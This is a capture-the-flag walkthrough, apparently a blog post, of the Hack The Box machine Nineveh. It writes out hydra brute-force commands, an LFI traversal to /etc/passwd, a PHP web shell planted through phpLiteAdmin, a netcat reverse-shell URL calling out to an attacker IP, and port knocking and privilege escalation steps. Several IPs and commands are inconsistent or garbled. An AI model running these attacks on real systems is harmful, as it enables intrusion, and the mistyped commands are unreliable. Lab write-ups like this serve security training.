NINEVEH
Lets start to enumeration with nmap as always. Target machine is 10.129.132.70 and nmap command is:
nmap -sC -sV -O nmap.txt 10.129.132.70
Nothing comes at the browser, so that we should update /etc/hosts file.
We added 10.129.132.170 nineveh.htb to any line.
Now we just see a text showing that it works.
Lets make a directory fuzzing
gobuster /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u nineveh.htb -t 15We got /department and /server-status directories.
Department directory redirected to login.php page, now we have attack surface, sql injection and brute force are options. I choose brute force via hydra tool.
Source code mentions admin and amrois, may be one of them is valid username. Lets try.
Admin and random password attempt says “invalid password” this mean admin is valid username and amrois is invalid.
Try to brute force with admin username.
hydra -l 'admin' -P /usr/share/worlists/rockyou.txt nineveh.htb http-post-form 'department/login.php:username^USER^&password=^PASS^&Login=Login:Invalid Password'
We got the password and there is a note at end of the page.
Website running with php and has info.php file but not usefull.
I decided to try lfi because as we see url is reading a file.
After some trials, we see that the following url works.
nineveh.htb/department/manage.phpnotes=files/ninevehNotes.txt/../../../etc/passwdpğasswdpasswd
Certificate of website gives some idea to login, we noted admin@nineveh.htb
Again brute force attack via hydra and we got password again.
After login we see that running db page.
There is a rce related to phpLiteAdmin lets try.
I open exploit to examine.
Here we need to apply what is described in the exploit
Create a db named hack.php
Create new table and add <?php echo system($_REQUEST [“cmd”]); ?> then save.
Add revershell to URL and open netcat
(reverse shell code is encoded in the URL )
nineveh.htb/department/manage.php?notes=/ninevehNotes/../var/tmp/hack.php&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.14.42+3333+%3E/tmp/f
When we go this URL with browser shell will be dropped.
I browsing directories and see nineveh.png file.
This file contain private key, I open this command with:
strings -n 20 nineveh.png
The command binwalk -Me nineveh.png --run-as=root does the following:
- Scans the file
nineveh.pngfor embedded files or file systems. - Extracts any embedded files or file systems it finds.
- Recursively scans any extracted files for further embedded content.
- Runs the extraction process with root privileges.
After extraction we got rsa private key and we can use this to make ssh connection now.
After few attempts I coudn’t connect and watch IPPSEC solution, he talking about port knocking. We have obtained two files: nineveh.priv and nineveh.pub. When I discover private keys, the first action I take is attempting to SSH into the user’s account using the private key. However, as you might recall, nmap did not detect an open port running SSH. This leads us to another finding from our privilege escalation phase that we have not yet explored.
While running LinEnum, it indicated that port 22 was listening on localhost, even though nmap did not show this port as open.
This suggests the use of a technique called port knocking, which is a method to externally open ports on a firewall by attempting connections on a series of predetermined closed ports. When the correct sequence of connection attempts is made, the firewall rules are dynamically adjusted to allow the host that made these attempts to connect via specific port(s).
In essence, if you know the precise sequence of ports to connect, you can open port 22. To discover the sequence, we need to enumerate files on the server. The first file we need is called “knocked.”
openSSH ports sequence: 571, 290, 911
for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43 && sleep 1; done
I found user.txt and we need to make privilege escalation now to read root.txt Lets make enumeration via LinEnum.sh. I open http server to transfer this.
But we didn’t get anything useful. I will use pspy to make enumeration again.
Kali in the tmp directory
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64spython3 -m http.server 7777At the shell
wget 10.10.14.3:7777/pspy64s
chmod +x pspy64s
./pspy64sThere is an interesting process pop up, chkrootkit
After a little bit search, we find a vulnerability related priv. escalation.
Steps to be root user at the below:
And finally we got root user.
